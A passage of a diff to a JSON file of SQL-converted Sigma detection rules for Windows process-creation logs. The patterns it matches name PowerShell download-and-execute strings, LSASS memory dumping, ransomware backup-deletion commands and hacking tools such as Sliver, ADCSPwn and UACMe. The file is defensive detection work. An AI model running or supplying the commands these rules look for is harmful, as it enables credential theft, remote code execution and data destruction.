], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\NetworkProvider%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8%' ESCAPE '\\')" ], - "filename": "proc_creation_win_registry_new_network_provider.yml" + "filename": "proc_creation_win_hktl_sliver_c2_execution_pattern.yml" }, { - "title": "Suspicious File Download Using Office Application", - "id": "0c79148b-118e-472b-bdb7-9b57b444cc19", + "title": "HackTool - ADCSPwn Execution", + "id": "cd8c163e-a19b-402e-bdd5-419ff5859f12", "status": "test", - "description": "Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files", - "author": "Beyu Denis, oscd.community", + "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1557.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% --adcs %' ESCAPE '\\' AND CommandLine LIKE '% --port %' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_office.yml" + "filename": "proc_creation_win_hktl_adcspwn.yml" 
}, { - "title": "HackTool - UACMe Akagi Execution", - "id": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", + "title": "PowerShell Web Download and Execution", + "id": "85b0b087-eddf-4a2b-b033-d771fa2b9775", "status": "experimental", - "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", - "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Scripts or tools that download files and execute them" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'UACMe' OR Company IN ('REvol Corp', 'APT 92', 'UG North', 'Hazardous Environments', 'CD Project Rekt') OR Description IN ('UACMe main module', 'Pentesting utility') OR OriginalFileName IN ('Akagi.exe', 'Akagi64.exe') OR (NewProcessName LIKE '%\\\\Akagi64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Akagi.exe' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\') OR Imphash IN ('767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\') AND (CommandLine LIKE '%IEX(%' ESCAPE '\\' OR CommandLine LIKE '%IEX (%' ESCAPE '\\' OR CommandLine LIKE '%I`EX%' ESCAPE '\\' OR CommandLine LIKE '%IE`X%' ESCAPE '\\' OR CommandLine LIKE '%I`E`X%' ESCAPE '\\' OR CommandLine LIKE '%| IEX%' ESCAPE '\\' OR CommandLine LIKE '%|IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%;iex $%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_uacme.yml" + "filename": "proc_creation_win_powershell_download_iex.yml" }, { - "title": "WannaCry Ransomware Activity", - "id": "41d40bff-377a-43e2-8e1b-2e543069e079", - "status": "test", - "description": "Detects WannaCry ransomware activity", - "author": "Florian Roth (Nextron Systems), Tom U. 
@c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", + "title": "ImagingDevices Unusual Parent/Child Processes", + "id": "f11f2808-adb4-46c0-802a-8660db50fa99", + "status": "experimental", + "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "attack.discovery", - "attack.t1083", "attack.defense_evasion", - "attack.t1222.001", - "attack.impact", - "attack.t1486", - "attack.t1490" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tasksche.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mssecsvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskdl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhsvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskse.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\111.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lhdfrgui.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\linuxnew.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wannacry.exe' ESCAPE '\\') OR NewProcessName LIKE '%WanaDecryptor%' ESCAPE '\\' OR (CommandLine LIKE '%icacls%' ESCAPE '\\' AND CommandLine LIKE '%/grant%' ESCAPE '\\' AND CommandLine LIKE '%Everyone:F%' ESCAPE '\\' AND CommandLine LIKE '%/T%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\') OR (CommandLine LIKE '%bcdedit%' ESCAPE '\\' AND CommandLine LIKE '%/set%' ESCAPE '\\' AND CommandLine LIKE '%{default}%' ESCAPE '\\' AND CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\') OR (CommandLine LIKE '%wbadmin%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%-quiet%' ESCAPE '\\') OR 
CommandLine LIKE '%@Please\\_Read\\_Me@.txt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND NewProcessName LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') OR ParentProcessName LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_wannacry.yml" + "filename": "proc_creation_win_imagingdevices_unusual_parents.yml" }, { - "title": "Potential Manage-bde.wsf Abuse To Proxy Execution", - "id": "c363385c-f75d-4753-a108-c1a8e28bdbda", - "status": "test", - "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", - "author": "oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - SecurityXploded Execution", + "id": "7679d464-4f74-45e2-9e01-ac66c5eb041a", + "status": "stable", + "description": "Detects the execution of SecurityXploded Tools", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.credential_access", + "attack.t1555" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR OriginalFileName = 'wscript.exe') AND CommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') OR (((ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Company = 'SecurityXploded' OR NewProcessName LIKE '%PasswordDump.exe' ESCAPE '\\' OR OriginalFileName LIKE '%PasswordDump.exe' 
ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_manage_bde.yml" + "filename": "proc_creation_win_hktl_secutyxploded.yml" }, { - "title": "Potential MSTSC Shadowing Activity", - "id": "6ba5a05f-b095-4f0a-8654-b825f4f16334", - "status": "test", - "description": "Detects RDP session hijacking by using MSTSC shadowing", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Modification Of Scheduled Tasks", + "id": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", + "status": "experimental", + "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1563.002" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%noconsentprompt%' ESCAPE '\\' AND CommandLine LIKE '%shadow:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /Change %' ESCAPE '\\' AND CommandLine LIKE '% /TN %' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE 
'%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\') AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%bash.exe%' ESCAPE '\\' OR CommandLine LIKE '%bash %' ESCAPE '\\' OR CommandLine LIKE '%scrcons%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%forfiles%' ESCAPE '\\' OR CommandLine LIKE '%scriptrunner%' ESCAPE '\\' OR CommandLine LIKE '%hh.exe%' ESCAPE '\\' OR CommandLine LIKE '%hh %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mstsc_rdp_hijack_shadowing.yml" + "filename": "proc_creation_win_schtasks_change.yml" }, { - "title": "HackTool - SharpUp PrivEsc Tool Execution", - "id": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", - "status": "experimental", - "description": "Detects the use of SharpUp, a tool for local privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "title": "Non-privileged Usage of Reg or Powershell", + "id": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", + "status": "test", + "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", + "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", "tags": [ - "attack.privilege_escalation", - 
"attack.t1615", - "attack.t1569.002", - "attack.t1574.005" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpUp.exe' ESCAPE '\\' OR Description = 'SharpUp' OR (CommandLine LIKE '%HijackablePaths%' ESCAPE '\\' OR CommandLine LIKE '%UnquotedServicePath%' ESCAPE '\\' OR CommandLine LIKE '%ProcessDLLHijack%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableServiceBinaries%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableScheduledTask%' ESCAPE '\\' OR CommandLine LIKE '%DomainGPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%CachedGPPPassword%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%set-itemproperty%' ESCAPE '\\' OR CommandLine LIKE '% sp %' ESCAPE '\\' OR CommandLine LIKE '%new-itemproperty%' ESCAPE '\\')) AND (IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%Services%' ESCAPE '\\' AND (CommandLine LIKE '%ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%ServiceDLL%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sharpup.yml" + "filename": "proc_creation_win_susp_non_priv_reg_or_ps.yml" }, { - "title": "DarkSide Ransomware Pattern", - "id": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "title": "Suspicious Outlook Child Process", + "id": "208748f7-881d-47ac-a29c-07ea84bf691d", "status": "test", - "description": "Detects DarkSide Ransomware and helpers", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious process spawning from an Outlook process.", + "author": "Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team", "tags": [ 
"attack.execution", - "attack.t1204" + "attack.t1204.002" ], "falsepositives": [ - "Unknown", - "UAC bypass method used by other malware" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%=[char][byte](''0x''+%' ESCAPE '\\' OR CommandLine LIKE '% -work worker0 -path %' ESCAPE '\\') OR (ParentCommandLine LIKE '%DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_darkside_ransomware.yml" + "filename": "proc_creation_win_office_outlook_susp_child_processes.yml" }, { - "title": "Time 
Travel Debugging Utility Usage", - "id": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", + "title": "Winnti Malware HK University Campaign", + "id": "3121461b-5aa0-4a41-b910-66d25524edbb", "status": "test", - "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", + "author": "Florian Roth (Nextron Systems), Markus Neis", "tags": [ "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" + "attack.t1574.002", + "attack.g0044" ], "falsepositives": [ - "Legitimate usage by software developers/testers" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\tttracer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\hpqhvind.exe%' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\Test.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\ProgramData\\\\DRM\\\\CLR\\\\CLR.exe' ESCAPE '\\' OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\DRM\\\\Windows%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml" + "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml" }, { - "title": "LSASS Memory Dumping", - "id": "ffa6861c-4461-4f59-8a41-578c39f3f23e", - 
"status": "test", - "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "title": "PUA - CsExec Execution", + "id": "d08a2711-ee8b-4323-bdec-b7d85e892b31", + "status": "experimental", + "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.resource_development", + "attack.t1587.001", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%lsass%' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\werfault.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\csexec.exe' ESCAPE '\\' OR Description = 'csexec'))" ], - "filename": "proc_creation_win_susp_lsass_dump.yml" + "filename": "proc_creation_win_pua_csexec.yml" }, { - "title": "Exploit for CVE-2015-1641", - "id": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "title": "Potential Crypto Mining Activity", + "id": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", "status": "stable", - "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", + "description": "Detects command line parameters or strings often used by crypto miners", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.impact", + "attack.t1496" ], "falsepositives": [ - "Unknown" + "Legitimate use of crypto miners", + 
"Some build frameworks" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MicroScMgmt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% pool.c %' ESCAPE '\\' OR CommandLine LIKE '% pool.o %' ESCAPE '\\' OR CommandLine LIKE '%gcc -%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2015_1641.yml" + "filename": "proc_creation_win_susp_crypto_mining_monero.yml" }, { - "title": "Renamed BrowserCore.EXE Execution", - "id": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", - "status": "experimental", - "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", - "author": "Max Altgelt (Nextron Systems)", + "title": "Exploit for CVE-2017-8759", + "id": "fdd84c68-a1f6-47c9-9477-920584f94905", + "status": "test", + "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", + "author": "Florian Roth 
(Nextron Systems)", "tags": [ - "attack.t1528", - "attack.t1036.003" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'BrowserCore.exe' AND NOT ((NewProcessName LIKE '%\\\\BrowserCore.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_browsercore.yml" + "filename": "proc_creation_win_exploit_cve_2017_8759.yml" }, { - "title": "Manage Engine Java Suspicious Sub Process", - "id": "cea2b7ea-792b-405f-95a1-b903ea06458f", - "status": "experimental", - "description": "Detects suspicious sub processes started by the Manage Engine ServiceDesk Plus Java web service process", - "author": "Florian Roth (Nextron Systems)", + "title": "Interactive AT Job", + "id": "60fc936d-2eb0-4543-8a13-911c750a1dfc", + "status": "test", + "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "tags": [ + "attack.privilege_escalation", + "attack.t1053.002" + ], "falsepositives": [ - "Legitimate sub processes started by Manage Engine ServiceDesk Pro" + "Unlikely (at.exe deprecated as of Windows 8)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\ManageEngine\\\\ServiceDesk\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\java.exe%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE 
